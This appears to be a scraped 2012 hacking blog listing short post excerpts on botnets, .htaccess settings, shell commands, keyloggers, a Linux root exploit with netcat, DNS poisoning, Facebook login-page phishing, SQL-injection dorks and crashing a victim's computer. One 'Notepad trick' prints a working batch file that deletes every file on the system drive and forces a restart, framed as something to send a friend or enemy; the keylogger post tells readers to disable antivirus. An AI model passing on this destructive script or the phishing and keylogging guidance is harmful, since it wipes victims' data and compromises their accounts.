Tuesday, 1 May 2012
Botnets
The main drivers for botnets are for recognition and financial gain.
The larger the botnet, the more ‘kudos’ the harder can claim to have
among the underground community. The bot herder will also ‘rent’ the
services of the botnet out to third parties, usually for sending out
spam messages, or for performing a denial of service attack against a
remote target. Due to the large numbers of compromised machines
within the botnet huge volumes of traffic (either email or denial of
service) can be generated. However, in recent times the volumes of
spam originating from a single compromised host have dropped in order
to thwart anti-spam detection algorithms – a larger number of
compromised hosts send a smaller amount of messages in order to evade
detection by anti-spam techniques.
Botnets have become a significant part of the Internet, albeit
increasingly hidden. Due to most conventional IRC networks taking
measures and blocking access to previously-hosted botnets,
controllers must now find their own servers. Often, a botnet will
include a variety of connections and network types. Sometimes a
controller will hide an IRC server installation on an educational or
corporate site where high-speed connections can support a large
number of other bots. Exploitation of this method of using a bot to
host other bots has proliferated only recently as most script kiddies
do not have the knowledge to take advantage of it.
Several botnets have been found and removed from the Internet. The
Dutch police found a 1.5 million node botnet and the Norwegian ISP
Telenor disbanded a 10,000-node botnet. In July 2010, the FBI
arrested a 23-year old Slovenian held responsible for the malicious
software that integrated an estimated 12 million computers into a
botnet. Large coordinated international efforts to shut down botnets
have also been initiated.It has been estimated that up to one quarter
of all personal computers connected to the internet may be part of a
botnet.
Botnet lifecycle
Tuesday, 1 May 2012 by w4r-b0y · 0
Thursday, 5 April 2012
Intro
Htaccess Supersession
How to stop someone looking
at your htaccess file
# Block people seeing the htaccess file
<Files .htaccess>
order deny,allow
deny from all
</Files>
How to redirect your 404 error to a custom
page
Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6 Server at yourwebsite.com Port 80
ErrorDocument 404
/404.php
ErrorDocument 404
/errormessages/404.php
How to setup a 301 Redirect
Redirect 301
old_location new_location
Redirect 301
/productreview.html http://www.yoursite.com/products/productreview.html
Redirect 301 /
http://www.newdomainname.com/
Change the Default
Directory Page
DirectoryIndex
notice.html
DirectoryIndex
notice.html index.cgi index.php index.html
Force users to use the WWW or Non-
WWW version of your domain
# Redirect non-www urls to www
RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\.yoursite\.com
RewriteRule (.*) http://www.yoursite.com/$1 [R=301,L]
# Redirect non-www urls to www
RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com [NC]
RewriteRule (.*) http://www.example.com/$1 [R=301,L]
# Redirect www urls to non-www
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www\.yoursite\.com [NC]
RewriteRule (.*) http://yoursite.com/$1 [R=301,L]
# Redirect www urls to non-www
RewriteEngine on
RewriteCond %{HTTP_HOST} !^example\.com
RewriteRule (.*) http://example.com/$1 [R=301,L]
Deny a user by IP Address
#ban users from
visiting the site
order allow,deny
deny from 123.45.6.7
allow from all
#ban users from
visiting the site
order allow,deny
deny from 123.45.6.7
deny from 987.65.4.3
deny from 56.45.34.456
allow from all
How to Stop Directory Listing
IndexIgnore *
IndexIgnore *.gif *.jpg
*.png accounts.doc
IndexIgnore /images/*
IndexIgnore /banners/*
Password Protect a
Directory
AuthType Basic
AuthName "
Name
of your secure area”
AuthUserFile /
fullpath/to/your/directory/.htpasswd
require valid-user
AuthType Basic
AuthName "Private Area"
AuthUserFile /home/mysite/.htpasswd
require valid-user
username:encryptedpassword
Kevin:nDh54k4Nc.C5c
Thursday, 5 April 2012 by w4r-b0y · 0
Saturday, 31 March 2012
First thing to keep in mind: If your computer hasn't crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:
1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.
2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.
Saturday, 31 March 2012 by w4r-b0y · 0
Tuesday, 20 March 2012
So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.
Tuesday, 20 March 2012 by w4r-b0y · 0
Monday, 19 March 2012
What are meta tags..??
In simple words, Audio and Video files contains some information about Title, Artist, Album, Genre, Date, Publisher, and more..
There are many meta tag editor available. But here is the way to edit them with VLC media player which is very popular media player at this time.
VLC media Player can be used to edit meta tags of both audio files as well as video files. :)
So, here is the way, just follow these simple steps:-
1) Open the media file in VLC Media Player and Click on Tools>>Media Information.
2) Thats it.!!Now you can edit all the meta tags and save them.
Alternative Method:-
There are many tools available out all over the internet, I found a tool named Mp3 Tag Editor which is Good to Edit MP3 file's meta tag. Download It here.
But VLC Media Player can edit almost every Audio and video file's Meta Tags.
Enjoy..!!!
Monday, 19 March 2012 by w4r-b0y · 1
Sunday, 18 March 2012
List of Some Basic BASH Commands:-
I'd like to point out to everyone before reading that this list is very far from completion and does not include all of the extendable possibilities. When I say this, nmap isn't a built-in command until you install nmap. These commands just stand for those that come with a Linux/UNIX BASH installation.
A
adduser Add a user to the system
addgroup Add a group to the system
alias Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
Sunday, 18 March 2012 by w4r-b0y · 0
Saturday, 17 March 2012
Misconceptions About Computer Worms And An Insight Into There Creation
Intro
There are a few misconceptions that some members have about Internet Worms and their behavior.all too often i hear people saying "Oh it looks like you have been infected by some kind of worm" and almost 99% of the time they are completely wrong. So here goes my attempt to clear up a few things on worms.
Definition
A computer worm is a self-replicating Malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is due to security shortcomings on the target computer.
REF:en.wikipedia.org/wiki/Computer_worm
Saturday, 17 March 2012 by w4r-b0y · 0
Q: What is hacking?
A: The terms "hack" are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term "hacking" is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime
Q: What is cracking?
A: Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.
by w4r-b0y · 0
Here are some Useful Things to do on CMD!!
First, open your Network Connection and right click and select Properties. Then Select TCP/IP and click on Properties again. Now Click on Advanced and WINS tab. Select Default for NeBIOS.
Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.
This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
First thing you need to know is some very helpfull commands to use on CMD(Command Prompt).
In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, off course... you know the drill).
Back to commands:
Commands:-
nslookup,
net view,
net use,
net user,
ping,
tracert,
arp route,
nbtstat,
netstat
ipconfig.
by w4r-b0y · 0
Friday, 16 March 2012
Ardamax Keylogger 2.85 Complete Download + Tutorial + Guide
Please Turn off your anti-virus....It is because keylogging is basically a trojan builder it will show detection...I have checked the copy and it is clean version...
SETTING-UP KEYLOGGER:-
Friday, 16 March 2012 by w4r-b0y · 0
I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!
Requirements for this tutorial:
- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.
by w4r-b0y · 1
Thursday, 15 March 2012
Here are some Notepad Tricks to make your friend/enemy look O.o :O
The blue screen of Death [This might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
save it as "Anything.bat"
Thursday, 15 March 2012 by w4r-b0y · 0
Many of the times I saw this question asked everywhere on the internet that
“Is it possible to infect victim using his IP address?”
So, I am going to show you how to do it.(n00b friendly TuT)
by w4r-b0y · 0
Wednesday, 14 March 2012
Wednesday, 14 March 2012 by w4r-b0y · 0
In Facebook, things are not all as it seems: there are people who are under false names, pictures, interests and even friends. You look at their profile and think “something here does not fit.” These characters seek to trick legitimate users the purpose of sending unsolicited advertising, steal personal information or engage in various scams.
We present a few simple rules to identify fake profiles on Facebook and prevent you from falling prey to this schemes. It’s easier than you think.
A fake profile of Facebook users actively seeks out others, sending friend requests, liking pages and posting messages on walls outside.
by w4r-b0y · 0
Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain & Abel.
Download Cain here
This Tutorial Will be limited to just redirecting the traffic to another website.
Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)
by w4r-b0y · 2
Tuesday, 13 March 2012
We all many times use proxies for staying anonymous on internet. Lets quickly check out , what we are actually doing while using proxies. We first connect to a proxy server which brings resources requested by us from the web server.
Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server and it is possible that owners of proxy server might reveal our identity. This means we cant actually rely on proxy servers for being anonymous online. Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.
Tuesday, 13 March 2012 by w4r-b0y · 0
Now im gonna make a step by step tutorial for facebook accounts..
ONE!:
go to "www.facebook.com/login.php" and right click on some white space
on the page and press "view source code". A LOT of text is gonna appear,
copy it all to notepad.
by w4r-b0y · 0
The almighty Google is just a search engine for common users, but, for hackers this search engine helps them to use Google Dorks (Kinda God Gift For Newbies) :
Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.
Many types of Dorks are used for this purpose-
But here I have a vast collection of more than 25000+ SQLi google dorks:-
by w4r-b0y · 0
WHAT IS AN E-BOMB ??
An E-Bomb is some kind of program that opens many windows, and crashes the target computer.
This guide can be followed by any one, but the only problem is getting the victim to open the executable file.
First of all, download this and follow the below illustrated steps :
by w4r-b0y · 0
Monday, 12 March 2012
World wide web is now expending, Internet has successfully turn the whole world into a village and for doing this social networks played and playing an important role, in the era of social networks there is a facebook, Facebook has a large number of user's and it is on hit list of attacker's and scam-er.
While you are using facebook or any social networking website there is a need to protect your information by using effective privacy techniques.
This article will talk about some security issues and their countermeasure on facebook or it can be applicable on other social networking websites.
Monday, 12 March 2012 by w4r-b0y · 0
We generally hear some terms like Trojan / Worm / Virus / Logic Bomb,etc..
By the way what are these???
Read and know about them below:
by w4r-b0y · 0
Many newbies don't know that how to find security holes in random sites..??
Now here is an easy way to do so.. :)
Follow the following steps.
by w4r-b0y · 0
Saturday, 10 March 2012
Intro
By now most people have wireless networks at home. A lot of them may have experienced leechers or have leeched themselves through an open network. An easy way to prevent that from happening is to encrypt your network traffic. One of these methods is by use of WEP or Wired Equivalent Privacy. I’m going to talk about why you shouldn’t use WEP and how easy it is to crack.Saturday, 10 March 2012 by w4r-b0y · 0